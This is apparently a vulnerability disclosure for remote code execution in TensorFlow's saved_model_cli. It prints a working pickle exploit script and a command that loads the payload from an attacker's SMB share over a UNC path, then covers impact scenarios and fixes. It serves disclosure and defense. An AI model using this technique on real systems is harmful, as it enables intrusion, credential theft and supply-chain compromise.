TensorFlow - Version 2.21.0 / Remote Code Execution (RCE) via Insecure Deserialization based on sink numpy.load and saved_model_cli run --inputs as Entry Point
Below are one (1) way to reproduce RCE in TensorFlow using an SMB share controlled by an attacker, without local intervention by a third party to modify files that allow code execution during the deserialization process.
For this PoC, two (2) different devices were used to simulate the interaction between an attacking machine (Raspberry Pi with IP 192.168.1.90) and a victim machine (Windows with IP 192.168.1.88).
Note: While this vulnerability is specifically verified and reported on version 2.21.0, other prior and subsequent versions may also be susceptible to this insecure deserialization vector.
Introduction
TensorFlow is an industry-leading, end-to-end open-source package for machine learning and artificial intelligence, originally developed by the Google Brain team. It features a comprehensive ecosystem of tools, libraries, and community resources that allows researchers and engineers to push the state-of-the-art in deep learning, computer vision, natural language processing, and robotic automation.
Widely adopted across Fortune 500 companies, research labs, and cloud ecosystems, TensorFlow forms the core backbone of critical inference pipelines and MLOps workflows. Given its deployment scaling from edge devices to high-performance GPU/TPU clusters, ensuring the security of its administrative and graph utilities—like saved_model_cli—is paramount to preventing supply chain infrastructure breaches.
Vulnerability Description
TensorFlow's saved_model_cli tool is a built-in command-line utility used to inspect and execute SavedModel execution graphs. When utilizing the run functionality, users can pass inputs via the --inputs flag. Under the hood, this loads data from the user-specified inputs using numpy.load() combined with the allow_pickle=True argument natively hardcoded and the universal file_io.FileIO reader.
This enables an infrastructure-level Remote Code Execution (RCE) vector: If an attacker can convince a user or automated pipeline to reference a remotely hosted and maliciously crafted .npy or .npz file containing a pickled payload, arbitrary Python code will be executed in the context of the user or system running the tool. By taking advantage of remote file access over network protocols (like SMB via UNC Windows paths), the attacker circumvents local boundaries, eliminating the need to have write access to the local machine’s file system.
The vulnerable code in tensorflow/python/tools/saved_model_cli.py:
def load_inputs_from_input_arg_string(inputs_str, input_exprs_str,
input_examples_str):
# ...
for input_tensor_key, (filename, variable_name) in inputs.items():
data = np.load(file_io.FileIO(filename, mode='rb'), allow_pickle=True) # pylint: disable=unexpected-keyword-arg
# ...
Technical Impact Analysis
Project Purpose & Context
TensorFlow is a core, industry-standard machine learning framework extensively used worldwide for training, deploying, and serving deep learning models. saved_model_cli specifically is a standard maintenance tool frequently deployed inside CI/CD pipelines, MLOps orchestration systems, and individual developer laptops for quick sanity-checking and executing inputs on .pb (SavedModel) resources.
Platform & Deployment Environment
This vulnerability affects the core Python package across all operating systems due to the use of numpy.load(..., allow_pickle=True). Exploitation is especially critical on Windows arrays/servers or distributed nodes since file_io.FileIO directly leverages Windows UNC paths to resolve remote SMB paths seamlessly, fetching the payload remotely over port 445 without needing traditional pre-mounted volume access.
Comprehensive Risk Assessment
The overall risk is heavily exacerbated by the context. Automated MLOps evaluation frameworks frequently ingest automated parameters to test dynamically built models. Exposing saved_model_cli functionality inside internal microservices or unauthenticated local validation hooks can immediately yield high-privilege code execution to an attacker without triggering conventional local file upload alarms.
Attack Scenario
Who wants to exploit a particular vulnerability?
A sophisticated attacker, rogue data scientist, or malicious insider with access to the input pipeline of an automated ML system, or social-engineering actors targeting ML engineers locally.
For what gain?
To breach the ML infrastructure, exfiltrate proprietary model architectures, steal datasets, manipulate system predictions, or pivot further into a corporate internal network.
In what way?
The attacker sets up a publicly accessible or internally reachable SMB share (e.g., on a malicious Raspberry Pi or through a compromised internal node). They host a maliciously crafted Python payload serialized into a .npy file. They then inject or supply the path (\\?\UNC\192.168.1.90\lab_share\exploit_payload.npy) to the --inputs flag used by the saved_model_cli utility. When the automation script (or tricked developer) executes the command, TensorFlow transparently resolves the UNC path over the network, reads the pickled contents, and triggers remote code execution dynamically via numpy.load(allow_pickle=True).
Reproduction Steps
1. On the Raspberry (attacker) - IP 192.168.1.90
kw0@kw0l4b:~ $ hostname -I | awk '{print $1}'
192.168.1.90
kw0@kw0l4b:~ $
Run the specialized exploit.py script to generate the exploit_payload.npy:
import pickle
import os
class Exploit:
def __reduce__(self):
# Trigger a visible action (launching Calculator on Windows)
return (eval, ("__import__('os').system('calc.exe')",))
payload = Exploit()
with open('/home/kw0/lab_attack/exploit_payload.npy', 'wb') as f:
pickle.dump(payload, f)
print("Payload generated: /home/kw0/lab_attack/exploit_payload.npy")
Run the script:
python exploit.py
2. On Windows (victim) - IP 192.168.1.88
- Create a
.venv, activate it, and install the latest updated version (2.21.0) ofTensorFlowusingpip install tensorflow. - Create a
dummy_modelfolder to avoid errors of--dirflag usingpython create_model.py. - And subsequently, remotely consume the attacker-controlled payload:
saved_model_cli run --dir dummy_model --tag_set serve --signature_def serving_default --inputs "x=\\?\UNC\192.168.1.90\lab_share\exploit_payload.npy"
Executive Summary: Insecure Deserialization Vulnerability in saved_model_cli
The research identifies a critical Remote Code Execution (RCE) vector stemming from the insecure use of the numpy.load(..., allow_pickle=True) function within TensorFlow's saved_model_cli tool.
- Root Cause: The loading of data using
pickle(an inherently insecure serialized format) when processing input files, without prior validation of the content. - Exploitation Mechanism: The tool allows a user to specify a file path. By supporting network protocols (such as SMB/UNC on Windows or simply malicious local file paths), the tool deserializes the content, executing arbitrary code in the context of the user invoking the command.
Analysis of Scope and Security Implications
Although the Proof of Concept (PoC) uses SMB to demonstrate the impact, the attack surface is significantly broader and more dangerous than it appears at first glance.
1. Infection Scenarios
- Supply Chain Attacks: An attacker could publish malicious "pre-trained" models or
.npyfiles on public repositories (Hugging Face, GitHub, PyPI). Any user or automated pipeline usingsaved_model_clito inspect these files would be instantly compromised. - AI Botnets: Given that Data Science environments often have high computing power (GPUs), large-scale exploitation through the deployment of "lure" models would enable the creation of botnets specifically designed for cryptocurrency mining or DDoS attacks, utilizing high-performance computing infrastructure.
- Targeted Info Stealers: AI and Data Science engineers often handle sensitive datasets, cloud service API keys (AWS, GCP, Azure), and intellectual property (model architectures). This RCE allows for the mass exfiltration of authentication tokens and environment variables (
.env) from high-trust workstations.
2. Factors Exacerbating Risk
- Integration in CI/CD: Many MLOps workflows use
saved_model_clito automatically validate models before pushing them to production. An attacker who manages to inject a file path into a CI/CD system can escalate privileges into the deployment environment, pivoting into the internal corporate network. - Protocol Transparency: By not requiring additional authentication in many cases (such as the use of UNC paths in internal environments), code execution occurs without prior operating system alerts, as it is the trusted tool itself that performs the call to the remote resource.
Conclusion and Recommendation
This vulnerability is of critical severity. The use of pickle to deserialize user-controlled input files is a high-risk practice that TensorFlow must remediate urgently.
Suggested actions for the development team:
- Disable
allow_pickle=Trueby default in any input file loading. - Implement signature validation: Ensure that only signed model files or those from verified sources can be processed.
- Input Sanitization: Limit allowed file schemes and prohibit access to UNC paths or unauthorized network protocols within CLI tools.